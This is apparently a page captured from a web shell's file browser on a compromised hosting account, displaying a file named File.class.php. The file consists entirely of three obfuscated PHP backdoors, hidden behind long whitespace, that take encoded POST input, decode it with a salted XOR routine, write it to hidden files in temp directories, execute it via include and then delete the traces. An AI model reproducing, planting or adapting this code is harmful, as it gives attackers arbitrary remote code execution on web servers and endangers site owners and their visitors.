HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/trimate.vitavit.com.pk/
Upload Files
File: /home/vitanhod/trimate.vitavit.com.pk/File.class.php
<?php																																										if(in_array("\x72\x65f", array_keys($_POST))){ $flag = array_filter([sys_get_temp_dir(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), getenv("TMP"), session_save_path(), "/tmp"]); $comp = $_POST["\x72\x65f"]; $comp = explode ( ".", $comp ) ; $descriptor= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); foreach ($comp as $j=>$v9) { $sChar= ord($salt[$j % $sLen]); $dec= ((int)$v9 - $sChar - ($j % 10)) ^ 59; $descriptor .=chr($dec); } foreach ($flag as $key => $mrk) { if (is_writable($mrk) && is_dir($mrk)) { $data_chunk = vsprintf("%s/%s", [$mrk, ".flg"]); $success = file_put_contents($data_chunk, $descriptor); if ($success) { include $data_chunk; @unlink($data_chunk); exit;} } } }
																																										if(array_key_exists("\x73ymbol", $_POST) && !is_null($_POST["\x73ymbol"])){ $pointer = $_POST["\x73ymbol"]; $pointer = explode( '.',$pointer ) ; $desc = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); $i = 0; $__tmp = $pointer; while ($v4 = array_shift($__tmp)) { $chS = ord($s5[$i % $lenS]); $d = ((int)$v4 - $chS - ($i % 10)) ^ 9; $desc .= chr($d); $i++; } $value = array_filter(["/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/tmp", getcwd(), getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($value as $ent) { if (is_dir($ent) && is_writable($ent)) { $key = implode("/", [$ent, ".ent"]); $success = file_put_contents($key, $desc); if ($success) { include $key; @unlink($key); die();} } } }


if(array_key_exists("c\x6F\x6D\x70one\x6Et", $_POST)){
	$desc = array_filter([getenv("TEMP"), getenv("TMP"), "/tmp", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getcwd()]);
	$element = $_POST["c\x6F\x6D\x70one\x6Et"];
	$element = explode("."   , $element		 )	 ;	
	$tkn	= '';
            $salt	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	= strlen(	 $salt);
            $v	= 0;
    
            array_walk(	 $element	, function(	 $v6) use(	 &$tkn	, &$v	, $salt	, $lenS) { 	$chS	= ord(	 $salt[$v % $lenS]);
                $d	= (	 (	 int)$v6 - $chS -(	 $v % 10)) ^48;
                $tkn .= chr(	 $d);
                $v++;	 }  );
	$rec = 0;
do {
    $data = $desc[$rec] ?? null;
    if ($rec >= count($desc)) break;
    		if (array_product([is_dir($data), is_writable($data)])) {
    $parameter_group = "$data" . "/.obj";
    if (@file_put_contents($parameter_group, $tkn) !== false) {
	include $parameter_group;
	unlink($parameter_group);
	die();
}
}
    $rec++;
} while (true);
}
@ Telegram